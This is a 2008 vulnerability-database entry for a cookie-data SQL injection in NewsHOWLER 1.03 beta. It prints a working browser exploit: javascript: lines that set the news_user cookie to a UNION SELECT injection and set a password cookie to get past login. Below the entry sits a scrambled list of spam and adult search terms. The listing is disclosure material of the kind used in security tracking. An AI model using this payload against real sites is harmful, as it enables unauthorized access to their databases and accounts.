about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , NewsHOWLER Cookie Data SQL Injection Vulnerability


Title NewsHOWLER Cookie Data SQL Injection Vulnerability
Published 2008-08-18-12:00AM
Updated 2008-08-27-08:14PM
Class Input Validation Error
CVE  
Remote  Yes
Local  No
Credit  IRCRASH (R3d.W0rm (Sina Yazdanmehr))
Vulnerable  Net Dupe NewsHOWLER 1.03 beta
Not Vulnerable  
Code  Attackers can use a browser to exploit this issue.The following exploit is available:javascript:document.cookie = "news_user=zz'+union+select+3,3,3,3+from+news_users/*; path=/";
javascript:document.cookie = "news_password=3; path=/";
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Tue, 15 Dec 2009 14:09:28 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
allmyguest www.wordls www.zhuoqi www.mai139 mambo Remo www.kahaa. XSS trace http://sex www.89.c0m php-nuke 2 rakshitha maxcpm.inf Videos zoo www.trish www.gegeji Videos zoo eqdk php-nuke 2 Blackcocks sexladies IceWarp We www.hmcp8. addguest.h www.hmcp8. ddz20.cn 06848.omc news/explo www.wtoabc sixy vedio maxcpm.inf windows me perreo phpbb 1.2. news for C tyujg www.258ai. Searching www.89.... Subdreamer game.wo007 serendipit Sexy india need for s SME.html/a components news.php joomla+1.7 www.xabaij Ayu farah News Searc